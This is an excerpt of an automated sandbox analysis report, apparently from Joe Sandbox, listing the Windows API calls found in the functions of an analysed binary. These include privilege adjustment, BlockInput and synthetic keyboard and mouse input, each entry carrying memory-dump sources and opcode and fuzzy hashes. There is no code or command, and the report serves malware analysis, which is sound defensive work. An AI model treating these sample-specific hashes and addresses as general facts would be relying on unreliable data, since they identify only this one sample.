                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D41182B1901228BEE7118BA8DC45FAF77ACEB05754F104555FD01E71D0C2B4AA04A7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F07223
                                                                                                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F0723A
                                                                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00F0724A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b36595e0fcf18b1a4cbb91658ad29e4fbf40b6dc3a13aaeea3607a15248a858
                                                                                                                                                                                                                                                      • Instruction ID: d564fc6c036970708f6d9f704be949216ceb3dc0b7aefbfa36827558811cec5a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b36595e0fcf18b1a4cbb91658ad29e4fbf40b6dc3a13aaeea3607a15248a858
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F01279D0430DBFDF04DFE8DD89AEDBBB8EF09201F104469A502E3191E27056449B10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F0F599
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F0F5C9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                      • Opcode ID: 19942985dda28d8a97b33e20c6a0421482676ab2eeb0f803c79d015eb1f121d3
                                                                                                                                                                                                                                                      • Instruction ID: 261b9c209bf5769b00cbebee10ef033bea98f3d57c12cc91ed3b622217c03959
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19942985dda28d8a97b33e20c6a0421482676ab2eeb0f803c79d015eb1f121d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E111C0326002049FD710EF28D849A2EF3E9FF95324F04891EF9AAD7391DB30AD059B81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F1BE6A,?,?,00000000,?), ref: 00F0CEA7
                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F1BE6A,?,?,00000000,?), ref: 00F0CEB9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                                      • Opcode ID: c533e7b21bc7144553eb2e6188131b511abc3641e6b27f6d091533d5c347984f
                                                                                                                                                                                                                                                      • Instruction ID: 9c02ae42a8ad6db45c9947683ee1ea0b9afa8bd73731d39317b814526766abb1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c533e7b21bc7144553eb2e6188131b511abc3641e6b27f6d091533d5c347984f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F0823550022DEBDB109FA4DC49FFB776DBF09361F004165F919D6191D6709A40DBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F04153
                                                                                                                                                                                                                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F04166
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                                                                      • Opcode ID: 40c72eeabe1689d6426ccfa1a1414d68b018afdb29730c053cfb4744d9d1eb86
                                                                                                                                                                                                                                                      • Instruction ID: 8981b8a83b70eab2bb4f86723774a7b082d60487c966bda0767f3ec678802f4f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40c72eeabe1689d6426ccfa1a1414d68b018afdb29730c053cfb4744d9d1eb86
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DF0677490424DAFDB068FA0C805BBE7BB0EF10305F04800AF966A61A2D7799612AFA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EFACC0), ref: 00EFAB99
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00EFACC0), ref: 00EFABAB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                                                                                      • Opcode ID: ad0690b3815473c39ad60e0902313314969ca31a0ed0c0024575fe71a3cefadb
                                                                                                                                                                                                                                                      • Instruction ID: 08a4a551c0b017dedd53bf5bc70b7f9b71bf2e6d7bad97fdc3dd7db1137f8ebb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0690b3815473c39ad60e0902313314969ca31a0ed0c0024575fe71a3cefadb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E0E675000510AFE7256F54FC09D7777E9EF043217108429F95A91574D7626C91DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00EE6DB3,-0000031A,?,?,00000001), ref: 00EE81B1
                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EE81BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                      • Opcode ID: 71c117f56979f8adf4b0f7f56ebd3791efa72b550ea77fee63518caa87378a27
                                                                                                                                                                                                                                                      • Instruction ID: 3695d3937f3832af7371fc8bb60b87499015feb982e037c372f1c284ee8cb1e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71c117f56979f8adf4b0f7f56ebd3791efa72b550ea77fee63518caa87378a27
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72B0923514460CABDB002FA1EC09B687FA8EB1AA52F008010FA0D440618B735410AAA2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                                      • Opcode ID: ecefc1028d82186d8c9933e1c254bf9f509cd8f7b8499594fc11066dcb278047
                                                                                                                                                                                                                                                      • Instruction ID: 9addcac590d44f0cead6828a688addf66de4f8ee89dcc13a5d8d8e366f93f3e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecefc1028d82186d8c9933e1c254bf9f509cd8f7b8499594fc11066dcb278047
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14A24971D04219CFCB24CF58C580BADBBB1BF48324F2591A9E899AB391D7359E82DF50
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 3728558374-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 643e9686addd45ff05d7c8965a2180c5e6559ad174997ad5f99ec08e4fa2c13f
                                                                                                                                                                                                                                                      • Instruction ID: 3bf4de4bf45e490d11331001f7f1feec5046073903676ad9cb0592739c36ab93
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 643e9686addd45ff05d7c8965a2180c5e6559ad174997ad5f99ec08e4fa2c13f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB72C071E042089FCF24EFA4C881AEEB7B5EF44314F14905AE905BB391D735AE46DB92
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: a57953265b8d89b910c2b48006e914ba1640194af288663c0c80157793e09271
                                                                                                                                                                                                                                                      • Instruction ID: 93dbd655782e0fcc101f243573021981f448a41a9c4a1a0fc5af91c0356e10a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a57953265b8d89b910c2b48006e914ba1640194af288663c0c80157793e09271
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5326621D28F894DD7239635DC22335A688EFB73C5F15E737E819B59AAEB29C4C35100
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __itow__swprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 674341424-0
                                                                                                                                                                                                                                                      • Opcode ID: 819f9e6256058c93c1305589f587f026470de31dba37e486f7ed0d4f44840b70
                                                                                                                                                                                                                                                      • Instruction ID: ffc22e4baf205105643d12cd71bae0101fb06022094d81ae1fdefa03eb97cb5a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 819f9e6256058c93c1305589f587f026470de31dba37e486f7ed0d4f44840b70
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7922AC715083019FD724DF14C995BAFB7E4EF84314F10591EF89AAB292DB32E946CB82
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: ee8571d64ab721c99f28c2364bfbde3ac48e19443c63dce9a2f686922cc77c9b
                                                                                                                                                                                                                                                      • Instruction ID: 318aa3072a15e0212ca69a3b68c7d48b6887c3d3f06a0576ac541fa16842d165
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8571d64ab721c99f28c2364bfbde3ac48e19443c63dce9a2f686922cc77c9b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57B11120D2AF454DD22396388831337B65CAFBB6D6F92D71BFD2B74D62EB2181835180
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __time64.LIBCMT ref: 00F0B6DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EE344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F0BDC3,00000000,?,?,?,?,00F0BF70,00000000,?), ref: 00EE3453
                                                                                                                                                                                                                                                        • Part of subcall function 00EE344A: __aulldiv.LIBCMT ref: 00EE3473
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2893107130-0
                                                                                                                                                                                                                                                      • Opcode ID: 28965d7d9d5ea0927e7a0a12a52bc5390c5d9a078d78658b2b6825129b0b9da8
                                                                                                                                                                                                                                                      • Instruction ID: 48281c7e77408cbd06b45d8ff82d68938d719bb7137bf64da670acfe4ce5ac1e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28965d7d9d5ea0927e7a0a12a52bc5390c5d9a078d78658b2b6825129b0b9da8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A221B472634510CBC729CF38C881A96B7E1EB95720B248E7DE4E5CB2D0CB74B905EB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00F16ACA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                                      • Opcode ID: f7f7720c46e3942b6b4122542c9c34f4e1e8acc90d90316dfc968b28d4e54180
                                                                                                                                                                                                                                                      • Instruction ID: 83716bf50cd3078383e5c7aa7c731e2456a1722c25e8a5d433650869aa60ff5d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7f7720c46e3942b6b4122542c9c34f4e1e8acc90d90316dfc968b28d4e54180
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5E012362102046FC700EB99D904E96B7ECAFB4761B05842AE945D7251DAB5E8449B90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F0750A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2434400541-0
